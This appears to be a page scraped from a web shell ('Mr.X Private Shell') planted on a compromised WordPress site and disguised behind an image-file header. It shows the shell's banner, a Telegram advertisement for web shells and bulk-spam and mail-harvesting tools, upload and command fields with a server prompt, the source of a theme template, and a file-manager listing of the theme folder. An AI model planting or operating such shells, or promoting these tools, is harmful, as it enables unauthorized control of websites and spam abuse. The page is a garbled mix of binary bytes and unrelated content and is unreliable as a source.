����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
<?php
/**
 * The Template for displaying all single posts
 * @since Homey 1.0
 */
get_header();
global $post, $homey_local;
$sticky_sidebar = homey_option('sticky_sidebar');

$default_sidebar = isset($sticky_sidebar['default_sidebar']) ? $sticky_sidebar['default_sidebar'] : 0;
$blog_author_box = 1;
$content_classes = "col-xs-12 col-sm-12 col-md-8 col-lg-8";
if(!is_active_sidebar('blog-sidebar')) {
    $content_classes = "col-xs-12 col-sm-12 col-md-12 col-lg-12";
}

if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'single' ) ) {
?>
<section class="main-content-area">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="page-title">
                    <div class="block-top-title">
                        <?php get_template_part('template-parts/breadcrumb'); ?>
                    </div><!-- block-top-title -->
                </div><!-- page-title -->
            </div><!-- col-xs-12 col-sm-12 col-md-12 col-lg-12 -->
        </div><!-- .row -->
    </div><!-- .container -->

    <div class="container">
        <div class="row">
            <div class="<?php echo esc_attr($content_classes); ?>">

                <div class="blog-wrap">
                    <div class="article-main">
                        <?php
                        // Start the Loop.
                        while ( have_posts() ) : the_post(); $author = homey_get_author('48', '48', 'img-circle'); ?>

                        <article class="single-blog-article block">
                            <div class="block-body">
                                <h1><?php the_title(); ?></h1>

                                <ul class="article-meta list-inline pull-left">
                                    <li class="post-author">
                                        <?php echo ''.$author['photo']; ?>
                                        <?php echo esc_attr($homey_local['by_text_sm']); ?> <a href="<?php echo esc_url( $author['link'] ); ?>"><?php echo esc_attr( $author['name'] ); ?></a>
                                    </li>
                                    <li class="post-date"><i class="homey-icon homey-icon-calendar-3"></i> <?php echo esc_attr( get_the_date() ); ?> </li>
                                    <li class="post-category"><i class="homey-icon homey-icon-award-badge-1"></i> <?php echo get_the_category_list( _x( ', ', 'Used between list items, there is a space after the comma.', 'homey' ) ); ?></li>
                                    <li><i class="homey-icon homey-icon-messages-bubble-text-1-messages-chat-smileys"></i> <?php echo comments_number( '0', '1' ); ?></li>
                                </ul>
                            </div>

                            <?php if( has_post_thumbnail( $post->ID ) ) { ?>
                            <div class="post-featured-image">
                                <?php the_post_thumbnail( 'homey-gallery' ); ?>
                            </div>
                            <?php } ?>

                            <div class="article-detail block-body">
                                <?php the_content(); ?>

                                <?php
                                $args = array(
                                    'before'           => '<div class="pagination-main"><ul class="pagination">' . esc_html__('Pages:','homey'),
                                    'after'            => '</ul></div>',
                                    'link_before'      => '<span>',
                                    'link_after'       => '</span>',
                                    'next_or_number'   => 'next',
                                    'nextpagelink'     => '<span aria-hidden="true"><i class="homey-icon homey-icon-arrow-right-1"></i></span>',
                                    'previouspagelink' => '<span aria-hidden="true"><i class="homey-icon homey-icon-arrow-left-1"></i></span>',
                                    'pagelink'         => '%',
                                    'echo'             => 1
                                );
                                wp_link_pages( $args );
                                ?>

                            </div>

                            <?php get_template_part( 'single-post/tags' ); ?>
                    
                        </article>

                        <?php get_template_part( 'single-post/post-nav' ); ?>

                        <?php
                        if( $blog_author_box != 0 ) {
                            get_template_part('single-post/author');
                        }?>

                        <?php get_template_part( 'single-post/related-posts' ); ?>

                    
                        <?php
                        // If comments are open or we have at least one comment, load up the comment template.
                        if ( comments_open() || get_comments_number() ) {
                            comments_template();
                        }
                        endwhile; ?>
                    </div>
                </div><!-- grid-listing-page -->

            </div><!-- col-xs-12 col-sm-12 col-md-8 col-lg-8 -->

            <?php if(is_active_sidebar('blog-sidebar')) { ?>
            <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4  <?php if( $default_sidebar != 0 ){ echo ' homey_sticky'; } ?>">
                <div class="sidebar">
                    <?php get_sidebar(); ?>
                </div>
            </div>
            <?php } ?>
        </div><!-- .row -->
    </div>   <!-- .container -->
    
    
</section><!-- main-content-area listing-page grid-listing-page -->
<?php
}
get_footer();

Filemanager

Name Type Size Permission Actions
css Folder 0755
fonts Folder 0755
framework Folder 0755
images Folder 0755
img Folder 0755
inc Folder 0755
js Folder 0755
languages Folder 0755
single-experience Folder 0755
single-listing Folder 0755
single-post Folder 0755
template Folder 0755
template-parts Folder 0755
vc_templates Folder 0755
woocommerce Folder 0755
.DS_Store File 6 KB 0644
404.php File 1.23 KB 0644
archive-experience.php File 4.34 KB 0644
archive-hm_homey_memberships.php File 2.05 KB 0644
archive-listing.php File 4.22 KB 0644
archive.php File 2.16 KB 0644
author.php File 369 B 0644
comments.php File 2.85 KB 0644
content-grid.php File 1.54 KB 0644
content-list.php File 899 B 0644
content-none.php File 1.39 KB 0644
content-page.php File 968 B 0644
content.php File 1.42 KB 0644
custom_periods_auto_renewl_for_next_year.php File 10.26 KB 0644
footer.php File 2.12 KB 0644
functions.php File 86.62 KB 0644
header.php File 5.38 KB 0644
index.php File 1.92 KB 0644
localization.php File 42.9 KB 0644
page.php File 2.64 KB 0644
screenshot.png File 282.37 KB 0644
search.php File 1.92 KB 0644
searchform.php File 320 B 0644
sidebar-experience.php File 654 B 0644
sidebar-listing.php File 640 B 0644
sidebar.php File 649 B 0644
single-experience.php File 2.21 KB 0644
single-hm_homey_memberships.php File 41.63 KB 0644
single-listing.php File 3.47 KB 0644
single.php File 5.63 KB 0644
style.css File 8.02 KB 0644
taxonomy-experience_amenity.php File 216 B 0644
taxonomy-experience_area.php File 209 B 0644
taxonomy-experience_city.php File 209 B 0644
taxonomy-experience_country.php File 209 B 0644
taxonomy-experience_facility.php File 209 B 0644
taxonomy-experience_language.php File 209 B 0644
taxonomy-experience_state.php File 209 B 0644
taxonomy-experience_type.php File 209 B 0644
taxonomy-listing_amenity.php File 215 B 0644
taxonomy-listing_area.php File 215 B 0644
taxonomy-listing_city.php File 215 B 0644
taxonomy-listing_country.php File 215 B 0644
taxonomy-listing_facility.php File 215 B 0644
taxonomy-listing_state.php File 215 B 0644
taxonomy-listing_type.php File 215 B 0644
taxonomy-room_type.php File 215 B 0644
wpml-config.xml File 15.61 KB 0644